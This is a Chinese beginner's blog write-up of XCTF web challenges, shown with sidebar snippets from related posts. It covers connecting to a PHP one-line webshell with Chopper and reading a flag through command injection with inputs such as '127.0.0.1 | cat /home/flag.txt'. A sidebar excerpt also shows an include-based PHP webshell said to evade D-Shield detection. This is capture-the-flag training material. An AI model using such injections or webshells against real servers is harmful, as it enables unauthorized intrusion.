2020.3.17 XCTF的基础题

最新推荐文章于 2022-05-16 17:11:01 发布
最新推荐文章于 2022-05-16 17:11:01 发布
阅读量275 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DSR446/article/details/104973886
版权

题目描述在这里插入图片描述目标:了解php一句话木马、如何使用webshell
我们这里使用菜刀进行连接(也可以用蚁剑):
在这里插入图片描述在这里插入图片描述题目描述:
在这里插入图片描述这是远程命令执行(rec),我给个pikachu的讲解视频,里面讲的很基础,很适合像我这种零基础的小白。

pikachu

步骤:
1.打开浏览器,在文本框内输入127.0.0.1 | find / -name “flag.txt” (将 | 替换成 & 或 && 都可以),查找flag所在位置,
在这里插入图片描述2.在文本框内输入 127.0.0.1 | cat /home/flag.txt 可得到flag,如图所示。
在这里插入图片描述

藏蓝色的达达
关注
专栏目录
2020.3.19 XCTF基础
DSR446的博客
03-19 432
目描述:(学会使用hackbar) 1.打开hackbar,用get方式传递a=1,如图所示 2.勾选hackbar上的Enable post data,用post方式传递b=2,可获得flag,如图所示 原理: X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项 HTTP Referer...
2020.3.31xctf(Web_php_unserialize)③
DSR446的博客
03-31 336
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($th...
XCTF_MOBILE13_基础android
一个热爱逆向,喜爱学习、分享的猿。
03-15 2569
初探 附件为一个apk,在模拟器里安装一下: 运行后,主界面很简单,一个输入框,一个按钮: 随便输入一个字符串,点击按钮,提示错误: 从使用上只有这些信息,接下来反编译看一看。 MainActivity 使用jadx打开apk,进行反编译。 先看MainActivity类,代码不多,可以轻松找到其的按钮事件响应函数: this.login.setOnClickListener(new View.OnClickListener() { public voi...
XCTF_MOBILE17_Android2.0
一个热爱逆向,喜爱学习、分享的猿。
04-26 538
初见 附件为一个apk,无提示信息。 安装apk并打开: 随便输入一个字符串,点击确认: 好大的错误信息。 从使用上看,就获得这些信息,关键在“确认”按键的按下处理函数。 接下来静态分析看看。 静态分析 使用jadx加载apk,除了R、BuildConfig、JNI就剩下一个MainActivity类。 MainActivity类代码也很简单,按钮点击响应函数为: this.button.setOnClickListener(new View.OnClickListene..
XCTF mobile新手区解记录(WP)以及一些总结和思考
windy_ll的博客
03-28 1308
前言     疫情当下,都已经耍了好几个月了,都不知道干啥了,好不容易等到我四川宣布开学时间了,结果四川高校一点动静都没有,无聊,那就写一下解记录吧,有些先前已经在我个人博客上发过了,就不再重复写了,贴个链接就行了!!! 目:app3     此wp已经在个人博客写过,不在详细说明,详情请看链接:https://www.52pojie.cn/thread-1082706-1-1.htm...
攻防世界web刷 新手区 command_execution 详细解!!!超详细
qq_39585393的博客
11-13 4233
command_execution 目 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 目分析与解思路 1.目提示,写了一个ping功能但是没有写waf,再加上目是command——execution(命令执行),推测应该是在ping的过程夹杂了其他的命令导致文件泄漏。 2.ping哪个地址呢,要读取本地的文件,显然要ping本机的地址选择127.0.0.1: 1.先ping一下127.0.0.1看看返回值 成功返回结果,一共发送了3个包。 2.
CTFhub RCE解思路
kindyyy的博客
05-16 471
命令注入——无过滤 先打开目: 没有过滤
2020.3.16 xctf_Cyberpeace-n3k0
DSR446的博客
03-17 1425
初识web安全 外话: 我以前是学逆向和pwn的,每每看到别人学web那么厉害我心里痒痒的,所以开启了我web之路。但是 我的逆向之路并没有放弃,明天开始继续窥探逆向和web的世界,pwn的话,要是有时间就看看。文章写的不是很好,望不要见笑。 先说说这个php的弱类型比较,见链接: 关于弱类型的比较 php的弱类型比较会使’abc’ == 0为真,所以输入a=abc时...
3.level3-[XCTF-unserialize3]-[CVE-2016-7124]
qwsn
11-19 252
0x01、Web 1.XCTF-unserialize3 第一步:开启环境 图略 第二步:访问目链接,发现了一段php代码,如下所示 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-95BsdC0I-1605762236401)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20201107140737760.png)] 第三步:分析代码,很明显这里有一个魔术方法__wakeup,
5.level5-[XCTF-Web_php_unserialize]-[+的利用]-[私有属性的序列化]-[base64编码]
qwsn
11-19 2367
0x01、Web 1.Web_php_unserialize 第一步:打开目环境 图略 第二步:打开链接,发现一段php代码 图略 第三步:分析代码,撰写代码,生成payload 分析代码: <?php class Demo { #定义一个以Demo为名的类 private $file = 'index.php'; #给Demo类定义一个$file属性,并且赋值为index.php public function __construct($file) { #定
批量getshell教程+工具
07-28
批量getshell教程+工具
ctf之WEB练习一
渗透测试研究中心
12-15 766
一、查找备份文件1.通过https://github.com/maurosoria/dirsearch进行目录扫描python3 dirsearch.py -u http://10.10.10.175:32770 -e *2.最终获得index.php.bk备份文件,然后下载下来查看源码,即可获得flagflag为:Cyberpeace{855A1C4B3401294CB6604CC...
终结Webshell 加固web服务器
Asp.Net
01-14 808
用微软的IIS打造一个WEB服务器是件非常简单的事情,但是它的安全性实在不敢恭维。攻击者通过注入、上传、旁注等技术获得了某个网站的Webshell,然后进一步渗透提权,直至控制整个Web服务器。至于如何让攻击者无缘Webshell那是代码部分的问,我们做为管理员应该如何加固Web服务器,让攻击者在获得了Webshell之后无功而返呢?   一、设置命令权限   默认设置下,webshell
Kali linux 学习笔记(五十六)Web渗透——webshell(国菜刀、webacoo、weevely) 2020.3.31
闵行小鱼塘
03-31 1224
学习webshell
2019.10.31 unctf 一道基准覆盖加栈溢出的pwn
DSR446的博客
10-31 419
我当时没做出来,这里需要注意的是变量在栈的位置。我们通过精准覆盖,使程序到达存在栈溢出的地方。通过控制构造伪栈桢,达到我们的目的。 ...
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1738
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
最新绕过D盾的php Webshell
BaCde's Blog
03-17 1511
去年分析D盾的查杀规律弄的绕过。 查杀效果: 具体请看代码: <?php function cc(){ global $b; $a =$_GET[$b]; //此处可改成POST方式 $str =$a; return $str; } ?> <?php $b="url"; $c=cc(); $aa = $c; include($aa); 传入...
学习资源之1:Python
weixin_34281537的博客
07-06 102
1.Python基础篇: http://man.lupaworld.com/content/manage/ringkee/basic.htm   2.Python 基础语法(一) http://www.cnblogs.com/Peter-Zhang/archive/2011/12/24/2300187.html   3.Python文社区 http://python.cn/   ...
攻防世界-密码目-shanghai
Fisher
05-09 1555
网鼎杯的一道密码,本write up 主要是自己观看总结,思路是根据如下大佬博客所写: https://myhloli.com/2018%e7%bd%91%e9%bc%8e%e6%9d%af-%e7%ac%ac%e5%9b%9b%e5%9c%ba-shanghai-writeup.html 拿到手像是凯撒密码加密,但是解码之后还是没有收获,最后了解是维吉尼亚密码,是凯撒密码的变形 关键代码: orwquad mtxvvvpg dhjsk xui tmxjum ith cyspquxzl zlr xvgpp
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli ,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值